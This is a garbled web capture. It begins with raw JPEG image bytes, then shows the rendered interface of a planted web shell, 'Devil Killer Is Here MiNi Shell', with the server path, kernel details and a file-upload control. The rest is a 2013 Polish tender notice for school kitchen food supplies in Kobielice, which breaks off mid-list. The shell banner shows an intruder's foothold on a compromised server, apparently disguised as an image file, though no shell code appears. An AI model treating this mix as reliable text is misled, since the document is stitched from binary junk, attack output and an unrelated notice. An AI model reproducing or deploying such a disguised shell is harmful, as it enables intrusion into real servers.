JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131209/266899-N-2013.html

<p class="kh_header"><b>Radostowice: Zakup środków żywieniowych wraz z dostarczeniem na potrzeby kuchni szkolnej 
w Szkole Podstawowej im. Adama Mickiewicza w Kobielicach na 2014 rok</b><br>
<b>Numer ogłoszenia: 266899 - 2013; data zamieszczenia: 09.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach , ul. Topolowa 61, 43-262 Radostowice, woj. śląskie, tel. 32 212 52 26, faks 32 212 52 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://spkobielice.edupage.org/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup środków żywieniowych wraz z dostarczeniem na potrzeby kuchni szkolnej 
w Szkole Podstawowej im. Adama Mickiewicza w Kobielicach na 2014 rok.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest zakup środków żywieniowych wraz z dostarczeniem,  
na potrzeby kuchni szkolnej w  Szkole Podstawowej im. Adama Mickiewicza w Kobielicach na 2014 rok, tj.  od 02.01.2014r. do 31.12.2014r. 2. Szczegółowy wykaz artykułów żywnościowych z podziałem na poszczególne części, wraz z ich rocznym zapotrzebowaniem zawarto w załącznikach do SIWZ. Ustala się VI części podlegających zamówieniu. Wykonawca może złożyć ofertę na całość zamówienia, poszczególną część lub na wybrane części: 1) Część I - Mięso, wędliny, konserwy i wyroby mięsne, 2) Część II - Drób, 3) Część III - Ryby, przetworzone i konserwowe, 4) Część IV - Warzywa, owoce i przetwory, 5) Część V - Oleje, tłuszcze zwierzęce i roślinne, produkty mleczarskie i jaja, 6) Część VI - Produkty sypkie i różne produkty spożywcze.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0, 15.40.00.00-2, 15.30.00.00-1, 15.50.00.00-3, 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku, wykonawcy zobowiązani są do złożenia oświadczenia 2 z art. 22 ustawy - zał. nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony w sytuacji, gdy wykonawca wykaże w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie: co najmniej jedno zamówienie polegające na dostawie ciągłej przez okres minimum 1 roku produktów spożywczych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca będzie realizował dostawy własnym transportem i na własne ryzyko. Każdy samochód, którym będzie dostarczana żywność musi posiadać aktualną decyzję Państwowego Inspektoratu Sanitarnego stwierdzającą spełnienie warunków do higienicznego przewozu określonych produktów ( art. spożywcze, warzywa, owoce, jaja, mięso i wędliny, itp.). Zamawiający zastrzega sobie prawo do zażądania stosownego dokumentu w momencie dostawy produktów. Żywność będzie dostarczana w pojemnikach Wykonawcy, za które nie będzie pobierał opłat. Zamawiający będzie zobowiązany do zwrotu pojemników Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy - Prawo Zamówień Publicznych - Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust.1 ustawy - Prawo Zamówień Publicznych - Załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zgodnie z pkt. III 3.2. niniejszego ogłoszenia.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może złożyć jedną ofertę. Złożenie większej liczby ofert lub oferty zawierającej rozwiązania alternatywne lub oferty wariantowej, spowoduje odrzucenie wszystkich ofert złożonych przez danego Wykonawcę.
Oferta musi być wypełniona zgodnie z treścią zał. nr 1 do SIWZ i podpisana przez osoby (osobę) uprawnione do składania oświadczeń woli w imieniu wykonawcy (podpis(y) winien/ny być opatrzony/e  pieczęcią imienną osoby (osób) uprawnionych do składania oświadczeń woli w imieniu wykonawcy, a w przypadku braku pieczęci należy złożyć czytelny podpis określający imię i nazwisko w/w osoby (osób). 
Wraz z ofertą należy złożyć odpowiednio na każdą wybraną do realizacji część, wypełnione zał. 7a - 7f do SIWZ.
Treść oferty musi odpowiadać treści niniejszej SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany treści umowy na podstawie art. 144 ustawy 
o zamówieniach publicznych, w tym przypadku ustawowej stawki VAT, jednak w sytuacji łącznego spełnienia 2 przesłanek:gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art.357Kc, zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych przypadkach:Zmiany: -zmiana adresu,siedziby,konta,firmy Zamawiającego,Wykonawcy, -zmiana osób występujących po stronie Zamawiającego,Wykonawcy, -zmiana będąca skutkiem poprawy oczywistej omyłki, Inne zmiany. Zmiana cen: -zmianę cen jednostkowych asortymentu objętego umowa w przypadku zmiany wielkości opakowania wprowadzonej przez producenta z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową. -zmianę cen jednostkowych asortymentu objętego umową na cenę niższą niż ustalona  w umowie z zastrzeżeniem warunków dotyczących ich jakości określonych w SIWZ. -dopuszcza się na wniosek Wykonawcy kwartalną waloryzację cen dostarczanych towarów żywnościowych w oparciu o wskaźnik wzrostu cen towarów i usług konsumpcyjnych ogółem w danym kwartale, podawany przez Prezesa Głównego Urzędu Statystycznego, ogłaszany w Dzienniku Urzędowym R.P. Monitor Polski. Warunkiem zastosowania waloryzacji jest wzrost tego wskaźnika ponad 3% w stosunku kwartał do poprzedniego kwartału. Zamawiający na podstawie art. 144 ustawy dopuści zmianę umowy dotyczącą przedmiotu zamówienia, również w następujących przypadkach: -zmiana wysokości wynagrodzenia brutto w przypadku zmiany w okresie    obowiązywania umowy stawki podatku VAT wartość netto pozostaje bez zmian, -działania sił natury, uznanego za stan klęski żywiołowej, -gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, a szczególności terminu realizacji zamówienia. -zmiany powszechnie obowiązującego prawa w zakresie mającym wpływ na realizację umowy po dacie jej podpisania. Określa się następujący tryb dokonywania zmian postanowień umowy: Sposób inicjowania zmian: -Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany, niezwłocznie po zajściu okoliczności uzasadniającej zmianę, -Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach (notatka służbowa, pismo Wykonawcy, protokół konieczności, itp. -W rezultacie dokonania czynności opisanych powyżej może dojść do podpisania przez strony aneksu do umowy. Projekt aneksu przygotuje Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.spkobielice.edupage.org/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://www.spkobielice.edupage.org/.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.12.2013 godzina 09:00, miejsce: Szkoła Podstawowa im. Adama Mickiewicza w Kobielicach, 43-262 Radostowice, ul. Topolowa 61..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Mięso, wędliny, konserwy i wyroby mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Boczek wędzony kg 30, 2. Kiełbasa domowa kg 150,3. Kiełbasa drobiowa krojona kg 6, 4. Kiełbasa kasztelańska krojona kg 4, 5. Kiełbasa zwyczajna kg 200, 6. Kiełbaska win erka kg 50, 7. Kiełbaski Śląskie kg 30, 8. Kita wieprzowa kg 10, 9. Kości wędzone kg	100, 10. Łopatka wieprzowa b k kg 750, 11. Mielonka kg 40, 12. Mięso garmażeryjne kg 400, 13. Mortadela kg 30, 14. Pasztet drobiowy 160g, wartość energ.w 100g produktu: 220 kcal, białko 7,5 g, węglowodany 5,5 g, tłuszcze 16,3 g p 80, 15. Pasztet wieprzowy kg 3, 16. Polędwica wędz. Gotowana krojona	kg 5, 17. Schab z kością kg 440, 18. Szynka drobiowa krojona kg 10, 19. Szynka konserwowa krojona kg 8, 20. Szynka koperkowa krojona kg	10, 21. Szynka mielona
krojona kg 10, 22. Szynka pieczona krojona kg 10, 23. Szynka prasowana wieprzowa krojona kg 5, 24. Szynka wiejska krojona kg 5, 25. Szynka wieprzowa krojona	kg 5, 26. Wołowe b k kg 220, 27. Żeberka wędzone kg 9, 28. Żeberka wieprzowe kg 2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Filet z kurczaka kg 650, 2. Kurczak kg 70, 3. Mięso gulaszowe z indyka kg 200, 4. Podudzie z kurczaka (pałka) kg 130, 5. Porcje rosołowe kg 200, 6. Udziec z indyka kg 70, 7. Udziec z kurczaka kg 240 8. Wątroba z indyka	kg 30, 9. Żołądki z kurczaka kg 15..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ryby przetworzone i konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Filet z makreli w sosie pomidorowym 170g puszki 80, 2. Filet z soli kg 180, 3. Paluszki rybne panierowana mrożone 57% filet rybny, wartość energ w 100g 230 kcal	kg 60, 4. Tuńczyk w sosie własnym 170g puszki 30..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa, owoce i przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Banan kg 340, 2. Brokuł mrożony 450g szt. 50 3. Brokuł świeży	szt. 20, 4. Brzoskwinie kondensowane 850 g puszka 4, 5. Brzoskwinie świeże	szt. 300 6. Buraki kg 250, 7. Cebula	kg 360, 8. Czosnek szt.	100, 9. Dżem 280g , bez konserwantów, zawartość cukru w 100g produktu 38g szt.150, 10. Fasola Jaś kg 50, 11. Fasola szparagowa 450g	szt. 6, 12. Groch łuskany kg 60, 13. Groszek - mrożonka, 450g. szt. 10, 14. Groszek konserwowy 400g szt 44, 15. Jabłka kg 600, 16. Kalafior mrożony 450g szt. 250, 17. Kalafior świeży szt. 80, 18. Kalarepa szt. 10, 19. Kapusta biała kg 600, 20. Kapusta biała nowa szt. 120, 21. Kapusta czerwona kg 300, 22. Kapusta czerwona nowa szt. 30, 23. Kapusta kiszona	kg 300, 24. Kapusta pekińska szt. 50, 25. Kapusta pekińska	kg 40, 26. Koncentrat buraczany 300ml 59,3% buraków ćwikłowych	szt 10, 27. Koncentrat pomidorowy 30% 1l szt. 120, 28. Kukurydza konserwowa 400g, 74 kcal w 100g	szt.10, 28.Mandarynka	kg 200, 30. Marchew kg	500, 31. Marchewka z groszkiem mrożonka, 450g. szt.	20, 32. Mrożonka zupa 450g szt. 120, 33. Nektarynka szt. 400, 34. Ogórek kiszony	kg 80, 35. Ogórek konserwowy 0,9l. l 190, 36. Ogórek zielony	kg 150, 37. Papryka konserwowa 0,9 l szt. 30, 38. Papryka świeża kg 20, 39. Pieczarka kg 80, 40. Pietruszka kg 40, 41. Pomarańcza kg 190, 42. Pomidor	kg 50 43. Por szt.	200, 44. Rzodkiewka pęczek 10, 45. Sałata	szt. 6, 46. Seler kg 40, 47. Sok owocowy 300ml, plastikowe opakowanie, produkowany w technologii: Top Aseptic szt. 2000, 48. Sok wieloowocowy 200ml kartonik ,bez zawartości cukru szt. 2000, 49. Syrop owocowy 420 ml szt. 10, 50. Szczypiorek	pęczek 8, 51. Szpinak mrożony 450g szt. 60, 52. Truskawka mrożona 450g	szt. 20, 53. Ziemniaki kg 5000..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Oleje, tłuszcze zwierzęce i roślinne, produkty mleczarskie i jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Deser czekoladowy lub waniliowy z bitą śmietaną, 175g, wartość energ.- 101 kcal w 100g produktu	szt. 100, 2. Deser mleczny z czekoladą, 150g , wartość energ. w 100g produktu-195 kcal, zawartość tłuszczu w 100g produktu 13,3 g	szt	100, 3. Deser z bitą śmietaną 100g, wartość energ. w 100g produktu 99 kcal, zawartość tłuszczu w 100g produktu 3 g szt. 100, 4. Deser ryż na mleku z owocami, 180 g	szt. 100, 5. Jaja szt. 4600, 6. Jogurt 115g , wartość energ. 122 kcal w 100g produktu, 2,6 g białka w 100g produktu szt. 300, 7. Jogurt do picia owocowy 250g wartość energ w 100g 77 kcal zawartośc tłuszczu 1g białko 2,4g szt 300 8. Jogurt owocowy do picia 330g, wartość energ. 75 kcal w 100ml produktu, zawartość tłuszczu w 100ml produktu-1 g szt. 100, 9. Jogurt kremowy z dodatkiem owocowego musu 110g	Szt 100, 10. Jogurt owocowy 125g, wartość energ. w 100g 79 kcal, zawartość białka-1,8g w 100g produktu szt 300, 11. Jogurt owocowy 80g, wartość energ w 100g produktu 107 kcal, zawartość białka w 100g produktu 6,3g szt. 100, 12. Jogurt owocowy 125g, wartość energetyczna w 100g produktu 95 kcal szt.	500, 13. Jogurt owocowy, 125g , wartość energ. w 100g produktu 91 kcal, zawartość tłuszczu w 100g produktu 1,1g	szt. 300, 14. Kefir 400ml szt 150, 15. 	Margaryna mleczna do pieczenia i duszenia, opakowanie 250g, zawartość tłuszczu 70%	szt	800, 16. Masło 200g,  zawartość tłuszczu min. 82% szt 1300, 17. Mleko 3,2% 1l , warość energ. w 100ml 60 kcal szt. 500, 18. Napój mleczny owocowy 180g 	szt 300, 19. Olej uniwersalny 1l szt 400, 20. Ser biały krajanka 	kg	280, 21. Ser żółty krojony	kg	60, 22. Serek homogenio-wany 150g, wartość energetyczna w 100g produktu 144 kcal szt 400, 23. Serek topiony 100g zwykły
lub smakowy szt 350, 24. Śmietana 12% ,500g , wartość energ. w 100 ml 134 kcal, 	szt. 280, 25. Śmietana 30% 400ml szt 10, 26. Śmietana zakwaszana 400ml 18%	szt	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2, 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Produkty sypkie i różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Baton mleczny 21,5g, wartość energ. w 100g produktu 454 kcal Szt 50, 2. Batonik czekoladowy, 45g, wartość energ w 100g 511 kcal Szt 50, 3. Batonik z orzechowym nadzieniem w  jednym opakowaniu 2 sztuki batoników 43g op 50, 4. Biszkopty okrągłe 200g	szt. 20, 5. Biszkopty podłużne opak. 140g	szt 20, 6. Budyń z cukrem,60g wartość energ. po przyrządzeniu 85 kcal w 100g produktu, zawartość cukru w 100g 8,7g	szt 130, 7. Cukier	kg 1300, 8. Cukier waniliowy 10 g szt 150, 9. Cynamon sypki 15 g	szt 80, 10. Cytrynka 1l. szt 350, 11. Drożdże 100g szt 12, 12. Galaretka 100 g , wartość energ. po przyrządzeniu-49 kcal w 100g, zawartość cukru w 100g 10,6g	szt. 130, 13. Gałka muszkatowa 10 g szt 20, 14. Groszek ptysiowy200g	Szt 20, 15. Herbata 100g szt 800, 16. Herbatniki mały 50g szt 300, 17. Herbatnikowe ciasteczka, o długości 110mm, zawartość karmelu 32%, zawartość czekolady 35% 2 szt. w opak.  op 200, 18. Kakao ciemne, bez cukru, 200g, o zawartości tłuszczu od 10 do 12% szt 20, 19. Kasza gryczana 1kg kg 60, 20. Kasza jęczmienna 1 kg  kg 30, 21. Kasza manna 1kg	kg 14, 22. Kawa zbożowa150 g  wartość energ w 100g 331kcal białko 4,3g	szt 10, 23. Ketchup , 500 g, wartość energ. w 100g 94 kcal, zawartość koncentratu pomidor 37% szt 40, 24. Krem czekoladowo orzechowy 630g, zawiera 13% orzechów laskowych, wartość energ. 544 kcal w 100g produktu Szt 30, 25. Kruche ciastka maślane 190g	Szt 15, 26. Liść laurowy 6 g szt 40, 27. Majeranek 10 g szt 26, 28. Majonez dekoracyjny ,wartość energ. 739 kcal w 100g produktu, zawartość tłuszczu w 100g produktu- 80 g l 80, 29. Makaron domowy,250g zawartość jaj- 23,8% szt 46, 30. 